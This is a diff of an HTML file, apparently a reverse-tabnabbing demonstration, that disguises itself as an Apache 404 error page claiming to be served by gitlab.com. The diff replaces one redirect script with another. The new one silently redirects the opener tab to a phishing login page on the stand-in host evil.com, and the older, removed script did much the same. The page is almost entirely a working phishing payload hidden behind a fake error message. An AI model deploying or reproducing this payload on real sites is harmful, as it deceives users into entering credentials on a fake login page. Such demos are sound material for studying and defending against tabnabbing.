--- a/tabnab.html
+++ b/tabnab.html
@@ -1,18 +1,16 @@
+<!DOCTYPE html>
 <html>
-
-    <head><title>Error</title></head>
+<head>
+    <title>404 Not Found</title>
+</head>
 <body>
-<h1>Not Found</h1>
+    <h1>Not Found</h1>
     <p>The requested URL was not found on this server.</p>
     <hr>
     <address>Apache/2.2.15 (Red Hat) Server at gitlab.com Port 443</address>
-
+    <script>
+        window.opener.location.assign('https://evil.com/ph-login.html');
+    </script>
 </body>
-
-<script>
-if (window.opener) window.opener.parent.location.replace('http://evil.com');
-if (window.parent != window) window.parent.location.replace('http://evil.com');
-</script>
-blah
-
 </html>
+
